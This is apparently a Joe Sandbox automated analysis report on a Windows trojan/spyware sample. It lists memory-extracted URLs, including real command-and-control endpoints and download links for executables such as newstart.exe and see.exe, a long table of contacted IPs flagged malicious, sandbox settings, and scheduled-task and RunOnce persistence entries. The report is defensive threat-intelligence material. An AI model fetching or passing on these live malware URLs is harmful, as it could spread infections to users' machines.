                                                                                                                                                                                            http://tempuri.org/Entity/Id13ResponseVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              http://85.28.47.70/570d5d5e8678366c.phpqaspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2284338374.0000027EC1779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2237943833.0000027EC1774000.00000004.00000020.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://77.91.77.81/Kiru9gu/index.phpWwaxplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://signup.live.com/signup.aspxsvchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC172C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://85.28.47.70/570d5d5e8678366c.phpgaspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://account.lid=8(svchost.exe, 0000000D.00000002.4102771346.0000027EC0E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108652806.0000027EC1756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://api.ipify.org/FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, svchost.exe, 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://77.232.41.110/large/see.exeOpiumEd1espartu.exe, 00000022.00000002.4454469033.00000000011A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://tempuri.org/Entity/Id4ResponseDVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                http://85.28.47.70/Otgaspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    http://77.91.77.81/lend/newstart.exeaxplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapVP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        174.247.55.150
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        22394CELLCOUStrue
                                                                                                                                                                                                                                        44.213.196.246
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                        5.188.66.181
                                                                                                                                                                                                                                        unknownKazakhstan
                                                                                                                                                                                                                                        200590ASNLSKZfalse
                                                                                                                                                                                                                                        31.170.22.127
                                                                                                                                                                                                                                        unknownLatvia
                                                                                                                                                                                                                                        43513NANO-ASLVfalse
                                                                                                                                                                                                                                        166.0.235.52
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        11798ACEDATACENTERS-AS-1UStrue
                                                                                                                                                                                                                                        137.53.152.220
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        11995OHSUUStrue
                                                                                                                                                                                                                                        184.178.172.5
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                                                        67.43.227.228
                                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                                        36666GTCOMMCAfalse
                                                                                                                                                                                                                                        107.152.98.5
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        46562TOTAL-SERVER-SOLUTIONSUStrue
                                                                                                                                                                                                                                        46.8.60.2
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        57901PAUTINA-ASRUtrue
                                                                                                                                                                                                                                        199.102.104.70
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        20093ZEROLAGUStrue
                                                                                                                                                                                                                                        119.59.101.111
                                                                                                                                                                                                                                        unknownThailand
                                                                                                                                                                                                                                        56067METRABYTE-TH453LadplacoutJorakhaebuaTHfalse
                                                                                                                                                                                                                                        104.31.138.26
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                        47.121.183.107
                                                                                                                                                                                                                                        unknownChina
                                                                                                                                                                                                                                        37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                                                        177.126.86.78
                                                                                                                                                                                                                                        unknownBrazil
                                                                                                                                                                                                                                        262352NOVATELECOMLTDABRtrue
                                                                                                                                                                                                                                        113.161.210.60
                                                                                                                                                                                                                                        unknownViet Nam
                                                                                                                                                                                                                                        45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                                                                                                                                        47.121.182.88
                                                                                                                                                                                                                                        unknownChina
                                                                                                                                                                                                                                        37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                                                        177.39.193.109
                                                                                                                                                                                                                                        unknownBrazil
                                                                                                                                                                                                                                        262432KOFREREPECOMDETELECOMUNICACOESLTDABRtrue
                                                                                                                                                                                                                                        200.170.196.94
                                                                                                                                                                                                                                        unknownBrazil
                                                                                                                                                                                                                                        11432TeliumTelecomunicacoesLtdaBRfalse
                                                                                                                                                                                                                                        75.119.145.154
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        13645BROADBANDONEUStrue
                                                                                                                                                                                                                                        77.232.41.110
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        28968EUT-ASEUTIPNetworkRUfalse
                                                                                                                                                                                                                                        8.213.156.191
                                                                                                                                                                                                                                        unknownSingapore
                                                                                                                                                                                                                                        45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                                                                                                                        198.8.94.170
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        46562TOTAL-SERVER-SOLUTIONSUSfalse
                                                                                                                                                                                                                                        198.157.68.47
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        18676AVAYAUStrue
                                                                                                                                                                                                                                        197.98.201.15
                                                                                                                                                                                                                                        unknownSouth Africa
                                                                                                                                                                                                                                        3741ISZAtrue
                                                                                                                                                                                                                                        115.178.181.15
                                                                                                                                                                                                                                        unknownIndonesia
                                                                                                                                                                                                                                        18004WIRELESSNET-IDPTWIRELESSINDONESIAWINIDtrue
                                                                                                                                                                                                                                        103.152.112.234
                                                                                                                                                                                                                                        unknownunknown
                                                                                                                                                                                                                                        134687TWIDC-AS-APTWIDCLimitedHKtrue
                                                                                                                                                                                                                                        190.109.72.25
                                                                                                                                                                                                                                        unknownBrazil
                                                                                                                                                                                                                                        264231RGCOM-INFORMATICACOMUNICACAOLTDA-MEBRtrue
                                                                                                                                                                                                                                        43.129.195.235
                                                                                                                                                                                                                                        unknownJapan4249LILLY-ASUStrue
                                                                                                                                                                                                                                        185.32.47.105
                                                                                                                                                                                                                                        unknownAzerbaijan
                                                                                                                                                                                                                                        200154IZONE-ASAZtrue
                                                                                                                                                                                                                                        72.37.216.68
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        20093ZEROLAGUStrue
                                                                                                                                                                                                                                        188.209.246.243
                                                                                                                                                                                                                                        unknownYemen
                                                                                                                                                                                                                                        30873PTC-YEMENNETYEtrue
                                                                                                                                                                                                                                        45.79.189.110
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        63949LINODE-APLinodeLLCUStrue
                                                                                                                                                                                                                                        185.172.128.33
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        50916NADYMSS-ASRUtrue
                                                                                                                                                                                                                                        20.247.104.85
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                                                                                                                                                        103.148.45.167
                                                                                                                                                                                                                                        unknownunknown
                                                                                                                                                                                                                                        139982BVSNET-AS-IDPTBuanaVisualnetSentraIDfalse
                                                                                                                                                                                                                                        192.111.139.163
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        46562TOTAL-SERVER-SOLUTIONSUStrue
                                                                                                                                                                                                                                        27.123.3.141
                                                                                                                                                                                                                                        unknownIndonesia
                                                                                                                                                                                                                                        45706TGG-AS-IDTeleGlobeGlobalPTIDtrue
                                                                                                                                                                                                                                        57.139.102.111
                                                                                                                                                                                                                                        unknownBelgium
                                                                                                                                                                                                                                        2686ATGS-MMD-ASUStrue
                                                                                                                                                                                                                                        103.111.22.65
                                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                                        133673KWIKZO-ASKWIKZOComTechnologyPrivateLimitedINtrue
                                                                                                                                                                                                                                        129.126.65.78
                                                                                                                                                                                                                                        unknownSingapore
                                                                                                                                                                                                                                        17547M1NET-SG-APM1NETLTDSGtrue
                                                                                                                                                                                                                                        103.205.128.7
                                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                                        134850WAY2INTERNET-AS-INWAY2INTERNETPRIVATELIMITEDINtrue
                                                                                                                                                                                                                                        103.47.93.236
                                                                                                                                                                                                                                        unknownIndia
                                                                                                                                                                                                                                        9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                                                                                                                                                                                                                        222.165.223.138
                                                                                                                                                                                                                                        unknownIndonesia
                                                                                                                                                                                                                                        24207EXPRESSNET-AS-IDPTNettoCyberIndonesiaIDtrue
                                                                                                                                                                                                                                        180.119.121.185
                                                                                                                                                                                                                                        unknownChina
                                                                                                                                                                                                                                        137697CHINATELECOM-JIANGSU-YANGZHOU-IDCCHINATELECOMJiangSuYangZfalse
                                                                                                                                                                                                                                        181.28.137.18
                                                                                                                                                                                                                                        unknownArgentina
                                                                                                                                                                                                                                        10318TelecomArgentinaSAARfalse
                                                                                                                                                                                                                                        201.71.2.177
                                                                                                                                                                                                                                        unknownunknown
                                                                                                                                                                                                                                        269920INVERSIONESRDN3CAVEtrue
                                                                                                                                                                                                                                        67.43.228.251
                                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                                        36666GTCOMMCAtrue
                                                                                                                                                                                                                                        8.130.36.245
                                                                                                                                                                                                                                        unknownSingapore
                                                                                                                                                                                                                                        37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                                                        141.105.107.152
                                                                                                                                                                                                                                        unknownSpain
                                                                                                                                                                                                                                        200064IB-REDASEStrue
                                                                                                                                                                                                                                        107.180.101.226
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                                                                                                        148.72.23.56
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                                                                                                        212.19.171.48
                                                                                                                                                                                                                                        unknownFrance
                                                                                                                                                                                                                                        12362NETPLUSCOM-LEGACYFranceFRtrue
                                                                                                                                                                                                                                        117.74.65.207
                                                                                                                                                                                                                                        unknownChina
                                                                                                                                                                                                                                        4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNtrue
                                                                                                                                                                                                                                        104.18.11.5
                                                                                                                                                                                                                                        api.proxyscrape.comUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                        166.0.235.139
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        11798ACEDATACENTERS-AS-1UStrue
                                                                                                                                                                                                                                        166.62.121.127
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                                                                                                                                                                                                        195.2.76.207
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        48282VDSINA-ASRUtrue
                                                                                                                                                                                                                                        198.12.253.239
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                                                                                                        142.93.49.250
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                        178.62.7.98
                                                                                                                                                                                                                                        unknownEuropean Union
                                                                                                                                                                                                                                        14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                                                        182.16.175.174
                                                                                                                                                                                                                                        unknownIndonesia
                                                                                                                                                                                                                                        17995SOLUSINET-AS-IDPTiForteGlobalInternetIDfalse
                                                                                                                                                                                                                                        108.179.219.56
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                                                                                        103.36.35.251
                                                                                                                                                                                                                                        unknownIndonesia
                                                                                                                                                                                                                                        131111CEPATNET-AS-IDPTMoraTelematikaIndonesiaIDfalse
                                                                                                                                                                                                                                        174.64.199.79
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                                                                                                                                                                                                                        78.146.180.112
                                                                                                                                                                                                                                        unknownUnited Kingdom
                                                                                                                                                                                                                                        13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBtrue
                                                                                                                                                                                                                                        76.26.114.253
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        7922COMCAST-7922UStrue
                                                                                                                                                                                                                                        213.160.71.130
                                                                                                                                                                                                                                        unknownGermany
                                                                                                                                                                                                                                        12574ROUTINGFranzstr5152064AachenDEtrue
                                                                                                                                                                                                                                        186.248.197.210
                                                                                                                                                                                                                                        unknownBrazil
                                                                                                                                                                                                                                        23106AMERICANTOWERDOBRASIL-COMUNICACAOMULTIMIDIALTBRtrue
                                                                                                                                                                                                                                        171.254.1.190
                                                                                                                                                                                                                                        unknownViet Nam
                                                                                                                                                                                                                                        7552VIETEL-AS-APViettelGroupVNfalse
                                                                                                                                                                                                                                        139.162.238.184
                                                                                                                                                                                                                                        unknownNetherlands
                                                                                                                                                                                                                                        63949LINODE-APLinodeLLCUSfalse
                                                                                                                                                                                                                                        142.54.235.9
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        20093ZEROLAGUStrue
                                                                                                                                                                                                                                        192.252.214.20
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        46562TOTAL-SERVER-SOLUTIONSUStrue
                                                                                                                                                                                                                                        183.88.157.154
                                                                                                                                                                                                                                        unknownThailand
                                                                                                                                                                                                                                        45758TRIPLETNET-AS-APTripleTInternetTripleTBroadbandTHtrue
                                                                                                                                                                                                                                        169.239.223.136
                                                                                                                                                                                                                                        unknownSouth Africa
                                                                                                                                                                                                                                        328064LCOM-ASZAtrue
                                                                                                                                                                                                                                        103.124.137.251
                                                                                                                                                                                                                                        unknownIndonesia
                                                                                                                                                                                                                                        138089GMDP-AS-IDPTGlobalMediaDataPrimaIDtrue
                                                                                                                                                                                                                                        200.108.190.129
                                                                                                                                                                                                                                        unknownunknown
                                                                                                                                                                                                                                        3549LVLT-3549USfalse
                                                                                                                                                                                                                                        8.130.39.117
                                                                                                                                                                                                                                        unknownSingapore
                                                                                                                                                                                                                                        37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                                                        191.49.163.135
                                                                                                                                                                                                                                        unknownBrazil
                                                                                                                                                                                                                                        26615TIMSABRfalse
                                                                                                                                                                                                                                        50.63.12.33
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        398101GO-DADDY-COM-LLCUStrue
                                                                                                                                                                                                                                        94.131.7.1
                                                                                                                                                                                                                                        unknownUkraine
                                                                                                                                                                                                                                        29632NASSIST-ASGIfalse
                                                                                                                                                                                                                                        125.25.184.10
                                                                                                                                                                                                                                        unknownThailand
                                                                                                                                                                                                                                        23969TOT-NETTOTPublicCompanyLimitedTHfalse
                                                                                                                                                                                                                                        185.122.204.56
                                                                                                                                                                                                                                        unknownUnited Kingdom
                                                                                                                                                                                                                                        6842MBUZZGBtrue
                                                                                                                                                                                                                                        213.136.93.115
                                                                                                                                                                                                                                        unknownGermany
                                                                                                                                                                                                                                        51167CONTABODEtrue
                                                                                                                                                                                                                                        103.54.148.189
                                                                                                                                                                                                                                        unknownBangladesh
                                                                                                                                                                                                                                        134128MEGASPEEDNET-ASMegaSpeedNetBDtrue
                                                                                                                                                                                                                                        83.234.147.166
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        20485TRANSTELECOMMoscowRussiaRUtrue
                                                                                                                                                                                                                                        201.204.47.66
                                                                                                                                                                                                                                        unknownCosta Rica
                                                                                                                                                                                                                                        11830InstitutoCostarricensedeElectricidadyTelecomCRtrue
                                                                                                                                                                                                                                        190.14.155.198
                                                                                                                                                                                                                                        unknownCosta Rica
                                                                                                                                                                                                                                        52356RHInternationalTelecomServicesSACRtrue
                                                                                                                                                                                                                                        171.217.69.113
                                                                                                                                                                                                                                        unknownChina
                                                                                                                                                                                                                                        4134CHINANET-BACKBONENo31Jin-rongStreetCNtrue
                                                                                                                                                                                                                                        170.106.76.24
                                                                                                                                                                                                                                        unknownSingapore
                                                                                                                                                                                                                                        132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                                                                                                                                                                                        211.118.30.69
                                                                                                                                                                                                                                        unknownKorea Republic of
                                                                                                                                                                                                                                        3786LGDACOMLGDACOMCorporationKRfalse
                                                                                                                                                                                                                                        45.6.101.98
                                                                                                                                                                                                                                        unknownBrazil
                                                                                                                                                                                                                                        266181GOLDENLINKBRfalse
                                                                                                                                                                                                                                        163.47.35.102
                                                                                                                                                                                                                                        unknownBangladesh
                                                                                                                                                                                                                                        23688LINK3-TECH-AS-BD-APLink3TechnologiesLtdBDfalse
                                                                                                                                                                                                                                        45.128.133.141
                                                                                                                                                                                                                                        unknownEstonia
                                                                                                                                                                                                                                        206804ESTNOC-ASEEtrue
                                                                                                                                                                                                                                        181.143.61.124
                                                                                                                                                                                                                                        unknownColombia
                                                                                                                                                                                                                                        13489EPMTelecomunicacionesSAESPCOfalse
                                                                                                                                                                                                                                        72.10.160.172
                                                                                                                                                                                                                                        unknownCanada
                                                                                                                                                                                                                                        36666GTCOMMCAtrue
                                                                                                                                                                                                                                        85.28.47.70
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        31643GES-ASRUtrue
                                                                                                                                                                                                                                        43.153.49.49
                                                                                                                                                                                                                                        unknownJapan4249LILLY-ASUSfalse
                                                                                                                                                                                                                                        67.227.158.154
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        32244LIQUIDWEBUStrue
                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                                        Analysis ID:1472622
                                                                                                                                                                                                                                        Start date and time:2024-07-13 07:05:09 +02:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 15m 40s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:45
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Sample name:mlk3kK6uLZ.exe
                                                                                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                                                                                        Original Sample Name:b85fa0d79d936b8b006c535d006c7f29.exe
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@65/23@4/100
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 75%
                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 56%
                                                                                                                                                                                                                                        • Number of executed functions: 165
                                                                                                                                                                                                                                        • Number of non-executed functions: 140
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.190.159.2, 20.190.159.23, 20.190.159.64, 20.190.159.71, 40.126.31.73, 20.190.159.68, 40.126.31.69, 40.126.31.71, 87.248.205.0, 184.28.90.27, 20.114.59.183, 20.242.39.171, 52.165.164.15, 20.42.65.92, 52.165.165.26
                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                                                                        • Execution Graph export aborted for target axplong.exe, PID 760 because there are no executed function
                                                                                                                                                                                                                                        • Execution Graph export aborted for target mlk3kK6uLZ.exe, PID 4436 because it is empty
                                                                                                                                                                                                                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                        01:05:59API Interceptor13713797x Sleep call for process: axplong.exe modified
                                                                                                                                                                                                                                        01:06:05API Interceptor122x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                        01:06:14API Interceptor32x Sleep call for process: VP2pdCInvS.exe modified
                                                                                                                                                                                                                                        01:06:25API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                        01:07:15API Interceptor595839x Sleep call for process: Hkbsse.exe modified
                                                                                                                                                                                                                                        01:09:05API Interceptor27x Sleep call for process: newstart.exe modified
                                                                                                                                                                                                                                        01:09:14API Interceptor395x Sleep call for process: espartu.exe modified
                                                                                                                                                                                                                                        07:05:56Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        07:07:14Task SchedulerRun new task: Hkbsse path: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        07:09:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce espartu.exe C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe
